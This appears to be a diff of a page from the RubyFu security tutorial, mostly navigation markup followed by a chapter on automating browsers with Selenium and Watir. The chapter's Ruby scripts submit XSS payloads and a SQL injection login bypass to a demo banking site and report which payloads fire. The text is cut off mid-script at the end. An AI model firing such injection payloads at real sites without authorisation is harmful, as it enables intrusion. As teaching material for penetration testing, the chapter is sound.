<i class="fa fa-check"></i>
|
666
|
+
|
667
|
+
<b>4.</b>
|
668
|
+
|
669
|
+
Module 0x4 | Web Kung Fu
|
670
|
+
</a>
|
671
|
+
|
672
|
+
|
673
|
+
<ul class="articles">
|
674
|
+
|
675
|
+
|
676
|
+
<li class="chapter " data-level="4.1" data-path="module_0x4__web_kung_fu/sql_injection_scanner.html">
|
677
|
+
|
678
|
+
|
679
|
+
<a href="../module_0x4__web_kung_fu/sql_injection_scanner.html">
|
680
|
+
|
681
|
+
<i class="fa fa-check"></i>
|
682
|
+
|
683
|
+
<b>4.1.</b>
|
684
|
+
|
685
|
+
SQL Injection Scanner
|
686
|
+
</a>
|
687
|
+
|
688
|
+
|
689
|
+
</li>
|
690
|
+
|
691
|
+
<li class="chapter " data-level="4.2" data-path="module_0x4__web_kung_fu/databases.html">
|
692
|
+
|
693
|
+
|
694
|
+
<a href="../module_0x4__web_kung_fu/databases.html">
|
695
|
+
|
696
|
+
<i class="fa fa-check"></i>
|
697
|
+
|
698
|
+
<b>4.2.</b>
|
699
|
+
|
700
|
+
Databases
|
701
|
+
</a>
|
702
|
+
|
703
|
+
|
704
|
+
</li>
|
705
|
+
|
706
|
+
<li class="chapter " data-level="4.3" data-path="module_0x4__web_kung_fu/extending_burpsuite.html">
|
707
|
+
|
708
|
+
|
709
|
+
<a href="../module_0x4__web_kung_fu/extending_burpsuite.html">
|
710
|
+
|
711
|
+
<i class="fa fa-check"></i>
|
712
|
+
|
713
|
+
<b>4.3.</b>
|
714
|
+
|
715
|
+
Extending Burp Suite
|
716
|
+
</a>
|
717
|
+
|
718
|
+
|
719
|
+
</li>
|
720
|
+
|
721
|
+
<li class="chapter active" data-level="4.4" data-path="module_0x4__web_kung_fu/browser_manipulation.html">
|
722
|
+
|
723
|
+
|
724
|
+
<a href="../module_0x4__web_kung_fu/browser_manipulation.html">
|
725
|
+
|
726
|
+
<i class="fa fa-check"></i>
|
727
|
+
|
728
|
+
<b>4.4.</b>
|
729
|
+
|
730
|
+
Browser Manipulation
|
731
|
+
</a>
|
732
|
+
|
733
|
+
|
734
|
+
</li>
|
735
|
+
|
736
|
+
<li class="chapter " data-level="4.5" data-path="module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
737
|
+
|
738
|
+
|
739
|
+
<a href="../module_0x4__web_kung_fu/web_servcies_and_apis.html">
|
740
|
+
|
741
|
+
<i class="fa fa-check"></i>
|
742
|
+
|
743
|
+
<b>4.5.</b>
|
744
|
+
|
745
|
+
Web Services and APIs
|
746
|
+
</a>
|
747
|
+
|
748
|
+
|
749
|
+
<ul class="articles">
|
750
|
+
|
751
|
+
|
752
|
+
<li class="chapter " data-level="4.5.1" data-path="module_0x4__web_kung_fu/web_services.html">
|
753
|
+
|
754
|
+
|
755
|
+
<a href="../module_0x4__web_kung_fu/web_services.html">
|
756
|
+
|
757
|
+
<i class="fa fa-check"></i>
|
758
|
+
|
759
|
+
<b>4.5.1.</b>
|
760
|
+
|
761
|
+
Interacting with Web Services
|
762
|
+
</a>
|
763
|
+
|
764
|
+
|
765
|
+
</li>
|
766
|
+
|
767
|
+
<li class="chapter " data-level="4.5.2" data-path="module_0x4__web_kung_fu/interacting_with_apis.html">
|
768
|
+
|
769
|
+
|
770
|
+
<a href="../module_0x4__web_kung_fu/interacting_with_apis.html">
|
771
|
+
|
772
|
+
<i class="fa fa-check"></i>
|
773
|
+
|
774
|
+
<b>4.5.2.</b>
|
775
|
+
|
776
|
+
Interacting with APIs
|
777
|
+
</a>
|
778
|
+
|
779
|
+
|
780
|
+
<ul class="articles">
|
781
|
+
|
782
|
+
|
783
|
+
<li class="chapter " data-level="4.5.2.1" data-path="module_0x4__web_kung_fu/wordpress_api.html">
|
784
|
+
|
785
|
+
|
786
|
+
<a href="../module_0x4__web_kung_fu/wordpress_api.html">
|
787
|
+
|
788
|
+
<i class="fa fa-check"></i>
|
789
|
+
|
790
|
+
<b>4.5.2.1.</b>
|
791
|
+
|
792
|
+
WordPress API
|
793
|
+
</a>
|
794
|
+
|
795
|
+
|
796
|
+
</li>
|
797
|
+
|
798
|
+
<li class="chapter " data-level="4.5.2.2" data-path="module_0x4__web_kung_fu/twitter_api.html">
|
799
|
+
|
800
|
+
|
801
|
+
<a href="../module_0x4__web_kung_fu/twitter_api.html">
|
802
|
+
|
803
|
+
<i class="fa fa-check"></i>
|
804
|
+
|
805
|
+
<b>4.5.2.2.</b>
|
806
|
+
|
807
|
+
Twitter API
|
808
|
+
</a>
|
809
|
+
|
810
|
+
|
811
|
+
</li>
|
812
|
+
|
813
|
+
|
814
|
+
</ul>
|
815
|
+
|
816
|
+
</li>
|
817
|
+
|
818
|
+
|
819
|
+
</ul>
|
820
|
+
|
821
|
+
</li>
|
822
|
+
|
823
|
+
<li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
|
824
|
+
|
825
|
+
|
826
|
+
<a href="../module_0x4__web_kung_fu/ruby2javascript.html">
|
827
|
+
|
828
|
+
<i class="fa fa-check"></i>
|
829
|
+
|
830
|
+
<b>4.6.</b>
|
831
|
+
|
832
|
+
Ruby 2 JavaScript
|
833
|
+
</a>
|
834
|
+
|
835
|
+
|
836
|
+
</li>
|
837
|
+
|
838
|
+
<li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
|
839
|
+
|
840
|
+
|
841
|
+
<a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
|
842
|
+
|
843
|
+
<i class="fa fa-check"></i>
|
844
|
+
|
845
|
+
<b>4.7.</b>
|
846
|
+
|
847
|
+
Web Server and Proxy
|
848
|
+
</a>
|
849
|
+
|
850
|
+
|
851
|
+
</li>
|
852
|
+
|
853
|
+
|
854
|
+
</ul>
|
855
|
+
|
856
|
+
</li>
|
857
|
+
|
858
|
+
<li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
|
859
|
+
|
860
|
+
|
861
|
+
<a href="../module_0x5__exploitation_kung_fu/index.html">
|
862
|
+
|
863
|
+
<i class="fa fa-check"></i>
|
864
|
+
|
865
|
+
<b>5.</b>
|
866
|
+
|
867
|
+
Module 0x5 | Exploitation Kung Fu
|
868
|
+
</a>
|
869
|
+
|
870
|
+
|
871
|
+
<ul class="articles">
|
872
|
+
|
873
|
+
|
874
|
+
<li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
|
875
|
+
|
876
|
+
|
877
|
+
<a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
|
878
|
+
|
879
|
+
<i class="fa fa-check"></i>
|
880
|
+
|
881
|
+
<b>5.1.</b>
|
882
|
+
|
883
|
+
Fuzzer
|
884
|
+
</a>
|
885
|
+
|
886
|
+
|
887
|
+
</li>
|
888
|
+
|
889
|
+
<li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
|
890
|
+
|
891
|
+
|
892
|
+
<a href="../module_0x5__exploitation_kung_fu/metasploit.html">
|
893
|
+
|
894
|
+
<i class="fa fa-check"></i>
|
895
|
+
|
896
|
+
<b>5.2.</b>
|
897
|
+
|
898
|
+
Metasploit
|
899
|
+
</a>
|
900
|
+
|
901
|
+
|
902
|
+
<ul class="articles">
|
903
|
+
|
904
|
+
|
905
|
+
<li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
906
|
+
|
907
|
+
|
908
|
+
<a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
|
909
|
+
|
910
|
+
<i class="fa fa-check"></i>
|
911
|
+
|
912
|
+
<b>5.2.1.</b>
|
913
|
+
|
914
|
+
Auxiliary module
|
915
|
+
</a>
|
916
|
+
|
917
|
+
|
918
|
+
</li>
|
919
|
+
|
920
|
+
<li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
|
921
|
+
|
922
|
+
|
923
|
+
<a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
|
924
|
+
|
925
|
+
<i class="fa fa-check"></i>
|
926
|
+
|
927
|
+
<b>5.2.2.</b>
|
928
|
+
|
929
|
+
Exploit module
|
930
|
+
</a>
|
931
|
+
|
932
|
+
|
933
|
+
</li>
|
934
|
+
|
935
|
+
<li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
|
936
|
+
|
937
|
+
|
938
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
|
939
|
+
|
940
|
+
<i class="fa fa-check"></i>
|
941
|
+
|
942
|
+
<b>5.2.3.</b>
|
943
|
+
|
944
|
+
Meterpreter
|
945
|
+
</a>
|
946
|
+
|
947
|
+
|
948
|
+
<ul class="articles">
|
949
|
+
|
950
|
+
|
951
|
+
<li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
|
952
|
+
|
953
|
+
|
954
|
+
<a href="../module_0x5__exploitation_kung_fu/extensions.html">
|
955
|
+
|
956
|
+
<i class="fa fa-check"></i>
|
957
|
+
|
958
|
+
<b>5.2.3.1.</b>
|
959
|
+
|
960
|
+
API and Extensions
|
961
|
+
</a>
|
962
|
+
|
963
|
+
|
964
|
+
</li>
|
965
|
+
|
966
|
+
<li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
967
|
+
|
968
|
+
|
969
|
+
<a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
|
970
|
+
|
971
|
+
<i class="fa fa-check"></i>
|
972
|
+
|
973
|
+
<b>5.2.3.2.</b>
|
974
|
+
|
975
|
+
Meterpreter Scripting
|
976
|
+
</a>
|
977
|
+
|
978
|
+
|
979
|
+
</li>
|
980
|
+
|
981
|
+
<li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
982
|
+
|
983
|
+
|
984
|
+
<a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
|
985
|
+
|
986
|
+
<i class="fa fa-check"></i>
|
987
|
+
|
988
|
+
<b>5.2.3.3.</b>
|
989
|
+
|
990
|
+
Railgun API Extension
|
991
|
+
</a>
|
992
|
+
|
993
|
+
|
994
|
+
</li>
|
995
|
+
|
996
|
+
|
997
|
+
</ul>
|
998
|
+
|
999
|
+
</li>
|
1000
|
+
|
1001
|
+
|
1002
|
+
</ul>
|
1003
|
+
|
1004
|
+
</li>
|
1005
|
+
|
1006
|
+
<li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
|
1007
|
+
|
1008
|
+
|
1009
|
+
<a href="../module_0x5__exploitation_kung_fu/metasm.html">
|
1010
|
+
|
1011
|
+
<i class="fa fa-check"></i>
|
1012
|
+
|
1013
|
+
<b>5.3.</b>
|
1014
|
+
|
1015
|
+
metasm
|
1016
|
+
</a>
|
1017
|
+
|
1018
|
+
|
1019
|
+
</li>
|
1020
|
+
|
1021
|
+
|
1022
|
+
</ul>
|
1023
|
+
|
1024
|
+
</li>
|
1025
|
+
|
1026
|
+
<li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
|
1027
|
+
|
1028
|
+
|
1029
|
+
<a href="../module_0x6__forensic/index.html">
|
1030
|
+
|
1031
|
+
<i class="fa fa-check"></i>
|
1032
|
+
|
1033
|
+
<b>6.</b>
|
1034
|
+
|
1035
|
+
Module 0x6 | Forensic Kung Fu
|
1036
|
+
</a>
|
1037
|
+
|
1038
|
+
|
1039
|
+
<ul class="articles">
|
1040
|
+
|
1041
|
+
|
1042
|
+
<li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
|
1043
|
+
|
1044
|
+
|
1045
|
+
<a href="../module_0x6__forensic/windows_forensic.html">
|
1046
|
+
|
1047
|
+
<i class="fa fa-check"></i>
|
1048
|
+
|
1049
|
+
<b>6.1.</b>
|
1050
|
+
|
1051
|
+
Windows Forensic
|
1052
|
+
</a>
|
1053
|
+
|
1054
|
+
|
1055
|
+
</li>
|
1056
|
+
|
1057
|
+
<li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
|
1058
|
+
|
1059
|
+
|
1060
|
+
<a href="../module_0x6__forensic/android_forensic.html">
|
1061
|
+
|
1062
|
+
<i class="fa fa-check"></i>
|
1063
|
+
|
1064
|
+
<b>6.2.</b>
|
1065
|
+
|
1066
|
+
Android Forensic
|
1067
|
+
</a>
|
1068
|
+
|
1069
|
+
|
1070
|
+
</li>
|
1071
|
+
|
1072
|
+
<li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1073
|
+
|
1074
|
+
|
1075
|
+
<a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
|
1076
|
+
|
1077
|
+
<i class="fa fa-check"></i>
|
1078
|
+
|
1079
|
+
<b>6.3.</b>
|
1080
|
+
|
1081
|
+
Network Traffic Analysis
|
1082
|
+
</a>
|
1083
|
+
|
1084
|
+
|
1085
|
+
</li>
|
1086
|
+
|
1087
|
+
<li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
|
1088
|
+
|
1089
|
+
|
1090
|
+
<a href="../module_0x6__forensic/parsing_log_files.html">
|
1091
|
+
|
1092
|
+
<i class="fa fa-check"></i>
|
1093
|
+
|
1094
|
+
<b>6.4.</b>
|
1095
|
+
|
1096
|
+
Parsing Log Files
|
1097
|
+
</a>
|
1098
|
+
|
1099
|
+
|
1100
|
+
</li>
|
1101
|
+
|
1102
|
+
|
1103
|
+
</ul>
|
1104
|
+
|
1105
|
+
</li>
|
1106
|
+
|
1107
|
+
<li class="chapter " data-level="7" data-path="references/index.html">
|
1108
|
+
|
1109
|
+
|
1110
|
+
<a href="../references/index.html">
|
1111
|
+
|
1112
|
+
<i class="fa fa-check"></i>
|
1113
|
+
|
1114
|
+
<b>7.</b>
|
1115
|
+
|
1116
|
+
References
|
1117
|
+
</a>
|
1118
|
+
|
1119
|
+
|
1120
|
+
</li>
|
1121
|
+
|
1122
|
+
<li class="chapter " data-level="8" data-path="faqs/index.html">
|
1123
|
+
|
1124
|
+
|
1125
|
+
<a href="../faqs/index.html">
|
1126
|
+
|
1127
|
+
<i class="fa fa-check"></i>
|
1128
|
+
|
1129
|
+
<b>8.</b>
|
1130
|
+
|
1131
|
+
FAQs
|
1132
|
+
</a>
|
1133
|
+
|
1134
|
+
|
1135
|
+
</li>
|
1136
|
+
|
1137
|
+
<li class="chapter " data-level="9" data-path="contributors/index.html">
|
1138
|
+
|
1139
|
+
|
1140
|
+
<a href="../contributors/index.html">
|
1141
|
+
|
1142
|
+
<i class="fa fa-check"></i>
|
1143
|
+
|
1144
|
+
<b>9.</b>
|
1145
|
+
|
1146
|
+
Contributors
|
1147
|
+
</a>
|
1148
|
+
|
1149
|
+
|
1150
|
+
<ul class="articles">
|
1151
|
+
|
1152
|
+
|
1153
|
+
<li class="chapter " data-level="9.1" data-path="contributors/todo.html">
|
1154
|
+
|
1155
|
+
|
1156
|
+
<a href="../contributors/todo.html">
|
1157
|
+
|
1158
|
+
<i class="fa fa-check"></i>
|
1159
|
+
|
1160
|
+
<b>9.1.</b>
|
1161
|
+
|
1162
|
+
TODO
|
1163
|
+
</a>
|
1164
|
+
|
1165
|
+
|
1166
|
+
</li>
|
1167
|
+
|
1168
|
+
|
1169
|
+
</ul>
|
1170
|
+
|
1171
|
+
</li>
|
1172
|
+
|
1173
|
+
|
1174
|
+
|
1175
|
+
|
1176
|
+
<li class="divider"></li>
|
1177
|
+
<li>
|
1178
|
+
<a href="https://www.gitbook.com" target="blank" class="gitbook-link">
|
1179
|
+
Published with GitBook
|
1180
|
+
</a>
|
1181
|
+
</li>
|
1182
|
+
|
1183
|
+
</ul>
|
1184
|
+
</nav>
|
1185
|
+
</div>
|
1186
|
+
|
1187
|
+
<div class="book-body">
|
1188
|
+
<div class="body-inner">
|
1189
|
+
<div class="book-header" role="navigation">
|
1190
|
+
<!-- Actions Left -->
|
1191
|
+
|
1192
|
+
|
1193
|
+
<!-- Title -->
|
1194
|
+
<h1>
|
1195
|
+
<i class="fa fa-circle-o-notch fa-spin"></i>
|
1196
|
+
<a href="../" >RubyFu</a>
|
1197
|
+
</h1>
|
1198
|
+
</div>
|
1199
|
+
|
1200
|
+
<div class="page-wrapper" tabindex="-1" role="main">
|
1201
|
+
<div class="page-inner">
|
1202
|
+
|
1203
|
+
|
1204
|
+
<section class="normal" id="section-">
|
1205
|
+
|
1206
|
+
<h1 id="browser-manipulation"><a name="browser-manipulation" class="plugin-anchor" href="#browser-manipulation"><span class="fa fa-link"></span></a>Browser Manipulation</h1>
|
1207
|
+
<p>As a hacker, sometimes you need to automate your client side tests (ex. XSS) and reduce the false positives that happen specially in XSS tests. The traditional automation depends on finding the sent payload been received in the response, but it doesn't mean the vulnerability get really exploited so you have to do it manually again and again.</p>
|
1208
|
+
<p>Here we'll learn how to make ruby controls our browser in order to <strong>emulate</strong> the same attacks from browser and get the real results.</p>
|
1209
|
+
<p>The most known APIs for this task are <strong><em>Selenium</em></strong> and <strong><em>Watir</em></strong> which support most know web browsers currently exist.</p>
|
1210
|
+
<h2 id="selenium-webdriver"><a name="selenium-webdriver" class="plugin-anchor" href="#selenium-webdriver"><span class="fa fa-link"></span></a>Selenium Webdriver</h2>
|
1211
|
+
<p><a href="https://github.com/seleniumhq/selenium" target="_blank"><strong>Selenium</strong></a> is an umbrella project encapsulating a variety of tools and libraries enabling web browser automation.</p>
|
1212
|
+
<ul>
|
1213
|
+
<li>To install selenium gem<pre><code>gem install selenium-webdriver
|
1214
|
+
</code></pre></li>
|
1215
|
+
</ul>
|
1216
|
+
<h3 id="get-request"><a name="get-request" class="plugin-anchor" href="#get-request"><span class="fa fa-link"></span></a>GET Request</h3>
|
1217
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1218
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1219
|
+
<span class="hljs-comment">#</span>
|
1220
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">"selenium-webdriver"</span>
|
1221
|
+
|
1222
|
+
<span class="hljs-comment"># Profile Setup and Tweak </span>
|
1223
|
+
proxy = <span class="hljs-constant">Selenium::WebDriver::Proxy</span>.new(
|
1224
|
+
<span class="hljs-symbol">:http</span> => <span class="hljs-constant">PROXY</span>,
|
1225
|
+
<span class="hljs-symbol">:ftp</span> => <span class="hljs-constant">PROXY</span>,
|
1226
|
+
<span class="hljs-symbol">:ssl</span> => <span class="hljs-constant">PROXY</span>
|
1227
|
+
) <span class="hljs-comment"># Set Proxy hostname and port </span>
|
1228
|
+
profile = <span class="hljs-constant">Selenium::WebDriver::Firefox::Profile</span>.from_name <span class="hljs-string">"default"</span> <span class="hljs-comment"># Use an existing profile name </span>
|
1229
|
+
profile[<span class="hljs-string">'general.useragent.override'</span>] = <span class="hljs-string">"Mozilla/5.0 (compatible; MSIE 9.0; "</span> +
|
1230
|
+
<span class="hljs-string">"Windows Phone OS 7.5; Trident/5.0; "</span> +
|
1231
|
+
<span class="hljs-string">"IEMobile/9.0)"</span> <span class="hljs-comment"># Set User Agent</span>
|
1232
|
+
profile.proxy = proxy <span class="hljs-comment"># Set Proxy</span>
|
1233
|
+
profile.assume_untrusted_certificate_issuer = <span class="hljs-keyword">false</span> <span class="hljs-comment"># Accept untrusted SSL certificates </span>
|
1234
|
+
|
1235
|
+
<span class="hljs-comment"># Start Driver </span>
|
1236
|
+
driver = <span class="hljs-constant">Selenium::WebDriver</span>.<span class="hljs-keyword">for</span>(<span class="hljs-symbol">:firefox</span>, <span class="hljs-symbol">:profile</span> => profile) <span class="hljs-comment"># Start firefox driver with specified profile</span>
|
1237
|
+
<span class="hljs-comment"># driver = Selenium::WebDriver.for(:firefox, :profile => "default") # Use this line if just need a current profile and no need to setup or tweak your profile</span>
|
1238
|
+
driver.manage.window.resize_to(<span class="hljs-number">500</span>, <span class="hljs-number">400</span>) <span class="hljs-comment"># Set Browser windows size</span>
|
1239
|
+
driver.navigate.to <span class="hljs-string">"http://www.altoromutual.com/search.aspx?"</span> <span class="hljs-comment"># The URL to navigate </span>
|
1240
|
+
|
1241
|
+
<span class="hljs-comment"># Interact with elements</span>
|
1242
|
+
element = driver.find_element(<span class="hljs-symbol">:name</span>, <span class="hljs-string">'txtSearch'</span>) <span class="hljs-comment"># Find an element named 'txtSearch'</span>
|
1243
|
+
element.send_keys <span class="hljs-string">"<img src=x onerror='alert(1)'>"</span> <span class="hljs-comment"># Send your keys to element</span>
|
1244
|
+
element.send_keys(<span class="hljs-symbol">:control</span>, <span class="hljs-string">'t'</span>) <span class="hljs-comment"># Open a new tab</span>
|
1245
|
+
element.submit <span class="hljs-comment"># Submit the text you've just sent</span>
|
1246
|
+
</code></pre>
|
1247
|
+
<blockquote>
|
1248
|
+
<p>Note that the actual keys to send depend on your OS, for example, Mac uses <code>COMMAND + t</code>, instead of <code>CONTROL + t</code>.</p>
|
1249
|
+
</blockquote>
|
1250
|
+
<h3 id="post-request"><a name="post-request" class="plugin-anchor" href="#post-request"><span class="fa fa-link"></span></a>POST Request</h3>
|
1251
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1252
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1253
|
+
<span class="hljs-comment">#</span>
|
1254
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'selenium-webdriver'</span>
|
1255
|
+
|
1256
|
+
browser = <span class="hljs-constant">Selenium::WebDriver</span>.<span class="hljs-keyword">for</span> <span class="hljs-symbol">:firefox</span>
|
1257
|
+
browser.get <span class="hljs-string">"http://www.altoromutual.com/bank/login.aspx"</span>
|
1258
|
+
|
1259
|
+
wait = <span class="hljs-constant">Selenium::WebDriver::Wait</span>.new(<span class="hljs-symbol">:timeout</span> => <span class="hljs-number">15</span>) <span class="hljs-comment"># Set waiting timeout</span>
|
1260
|
+
<span class="hljs-comment"># Find the input elements to interact with later.</span>
|
1261
|
+
input = wait.<span class="hljs-keyword">until</span> {
|
1262
|
+
element_user = browser.find_element(<span class="hljs-symbol">:name</span>, <span class="hljs-string">"uid"</span>)
|
1263
|
+
element_pass = browser.find_element(<span class="hljs-symbol">:name</span>, <span class="hljs-string">"passw"</span>)
|
1264
|
+
<span class="hljs-comment"># Retrun array of elements when get displayed</span>
|
1265
|
+
[element_user, element_pass] <span class="hljs-keyword">if</span> element_user.displayed? <span class="hljs-keyword">and</span> element_pass.displayed?
|
1266
|
+
}
|
1267
|
+
|
1268
|
+
input[<span class="hljs-number">0</span>].send_keys(<span class="hljs-string">"' or 1=1;--"</span>) <span class="hljs-comment"># Send key for the 1st element </span>
|
1269
|
+
input[<span class="hljs-number">1</span>].send_keys(<span class="hljs-string">"password"</span>) <span class="hljs-comment"># Send key fro the next element</span>
|
1270
|
+
sleep <span class="hljs-number">1</span>
|
1271
|
+
|
1272
|
+
<span class="hljs-comment"># Click/submit the button based the form it is in (you can also call 'btnSubmit' method)</span>
|
1273
|
+
submit = browser.find_element(<span class="hljs-symbol">:name</span>, <span class="hljs-string">"btnSubmit"</span>).click <span class="hljs-comment">#.submit</span>
|
1274
|
+
|
1275
|
+
<span class="hljs-comment"># browser.quit</span>
|
1276
|
+
</code></pre>
|
1277
|
+
<p>Let's test the page against XSS vulnerability. First I'll list what kind of action we need from browser</p>
|
1278
|
+
<ol>
|
1279
|
+
<li>Open a browser window (Firefox)</li>
|
1280
|
+
<li>Navigate to a URL (altoromutual.com)</li>
|
1281
|
+
<li>Perform some operations (Send an XSS payload)</li>
|
1282
|
+
<li>Check if the payload is working(Popping-up) or it's a false positive </li>
|
1283
|
+
<li>Print the succeed payloads on terminal</li>
|
1284
|
+
</ol>
|
1285
|
+
<p><strong>selenium-xss.rb</strong></p>
|
1286
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1287
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1288
|
+
<span class="hljs-comment">#</span>
|
1289
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'selenium-webdriver'</span>
|
1290
|
+
|
1291
|
+
payloads =
|
1292
|
+
[
|
1293
|
+
<span class="hljs-string">"<video src=x onerror=alert(1);>"</span>,
|
1294
|
+
<span class="hljs-string">"<img src=x onerror='alert(2)'>"</span>,
|
1295
|
+
<span class="hljs-string">"<script>alert(3)</script>"</span>,
|
1296
|
+
<span class="hljs-string">"<svg/OnlOad=prompt(4)>"</span>,
|
1297
|
+
<span class="hljs-string">"javascript:alert(5)"</span>,
|
1298
|
+
<span class="hljs-string">"alert(/6/.source)"</span>
|
1299
|
+
]
|
1300
|
+
|
1301
|
+
browser = <span class="hljs-constant">Selenium::WebDriver</span>.<span class="hljs-keyword">for</span> <span class="hljs-symbol">:firefox</span> <span class="hljs-comment"># You can use :ff too</span>
|
1302
|
+
browser.manage.window.resize_to(<span class="hljs-number">500</span>, <span class="hljs-number">400</span>) <span class="hljs-comment"># Set browser size</span>
|
1303
|
+
browser.get <span class="hljs-string">"http://www.altoromutual.com/search.aspx?"</span>
|
1304
|
+
|
1305
|
+
wait = <span class="hljs-constant">Selenium::WebDriver::Wait</span>.new(<span class="hljs-symbol">:timeout</span> => <span class="hljs-number">10</span>) <span class="hljs-comment"># Timeout to wait </span>
|
1306
|
+
|
1307
|
+
payloads.each <span class="hljs-keyword">do</span> |payload|
|
1308
|
+
input = wait.<span class="hljs-keyword">until</span> <span class="hljs-keyword">do</span>
|
1309
|
+
element = browser.find_element(<span class="hljs-symbol">:name</span>, <span class="hljs-string">'txtSearch'</span>)
|
1310
|
+
element <span class="hljs-keyword">if</span> element.displayed?
|
1311
|
+
<span class="hljs-keyword">end</span>
|
1312
|
+
input.send_keys(payload)
|
1313
|
+
input.submit
|
1314
|
+
|
1315
|
+
<span class="hljs-keyword">begin</span>
|
1316
|
+
wait.<span class="hljs-keyword">until</span> <span class="hljs-keyword">do</span>
|
1317
|
+
txt = browser.switch_to.alert
|
1318
|
+
<span class="hljs-keyword">if</span> (<span class="hljs-number">1</span>..<span class="hljs-number">100</span>) === txt.text.to_i
|
1319
|
+
puts <span class="hljs-string">"Payload is working: <span class="hljs-subst">#{payload}</span>"</span>
|
1320
|
+
txt.accept
|
1321
|
+
<span class="hljs-keyword">end</span>
|
1322
|
+
<span class="hljs-keyword">end</span>
|
1323
|
+
<span class="hljs-keyword">rescue</span> <span class="hljs-constant">Selenium::WebDriver::Error::NoAlertOpenError</span>
|
1324
|
+
puts <span class="hljs-string">"False Positive: <span class="hljs-subst">#{payload}</span>"</span>
|
1325
|
+
<span class="hljs-keyword">next</span>
|
1326
|
+
<span class="hljs-keyword">end</span>
|
1327
|
+
|
1328
|
+
<span class="hljs-keyword">end</span>
|
1329
|
+
|
1330
|
+
browser.close
|
1331
|
+
</code></pre>
|
1332
|
+
<p>Result</p>
|
1333
|
+
<pre><code>> ruby selenium-xss.rb
|
1334
|
+
Payload is working: <video src=x onerror=alert(1);>
|
1335
|
+
Payload is working: <img src=x onerror='alert(2)'>
|
1336
|
+
Payload is working: <script>alert(3)</script>
|
1337
|
+
Payload is working: <svg/OnlOad=prompt(4)>
|
1338
|
+
False Positive: javascript:alert(5)
|
1339
|
+
False Positive: alert(/6/.source)
|
1340
|
+
</code></pre><h2 id="watir-webdriver"><a name="watir-webdriver" class="plugin-anchor" href="#watir-webdriver"><span class="fa fa-link"></span></a>Watir Webdriver</h2>
|
1341
|
+
<p><a href="http://watirwebdriver.com/" target="_blank"><strong>Watir</strong></a> is abbreviation for (Web Application Testing in Ruby). I believe that Watir is more elegant than Selenium but I like to know many ways to do the same thing, just in case. </p>
|
1342
|
+
<ul>
|
1343
|
+
<li>To install watir gem<pre><code>gem install watir-webdriver
|
1344
|
+
</code></pre></li>
|
1345
|
+
</ul>
|
1346
|
+
<h3 id="get-request"><a name="get-request" class="plugin-anchor" href="#get-request"><span class="fa fa-link"></span></a>GET Request</h3>
|
1347
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1348
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1349
|
+
<span class="hljs-comment">#</span>
|
1350
|
+
<span class="hljs-keyword">require</span> <span class="hljs-string">'watir-webdriver'</span>
|
1351
|
+
|
1352
|
+
browser = <span class="hljs-constant">Watir::Browser</span>.new <span class="hljs-symbol">:firefox</span>
|
1353
|
+
browser.goto <span class="hljs-string">"http://www.altoromutual.com/search.aspx?"</span>
|
1354
|
+
browser.text_field(<span class="hljs-symbol">name:</span> <span class="hljs-string">'txtSearch'</span>).set(<span class="hljs-string">"<img src=x onerror='alert(1)'>"</span>)
|
1355
|
+
btn = browser.button(<span class="hljs-symbol">value:</span> <span class="hljs-string">'Go'</span>)
|
1356
|
+
puts btn.exists?
|
1357
|
+
btn.click
|
1358
|
+
|
1359
|
+
<span class="hljs-comment"># browser.close</span>
|
1360
|
+
</code></pre>
|
1361
|
+
<p>Sometime you'll need to send XSS GET request from URL like <code>http://app/search?q=<script>alert</script></code>. You'll face a known error <code>Selenium::WebDriver::Error::UnhandledAlertError: Unexpected modal dialog</code> if the alert box popped up but it you do refresh page for the sent payload it'll work so the fix for this issue is the following.</p>
|
1362
|
+
<pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
|
1363
|
+
<span class="hljs-comment"># KING SABRI | <span class="hljs-doctag">@KINGSABRI</span></span>
|
1364
|
+
<span class="hljs-comment">#</span>
|
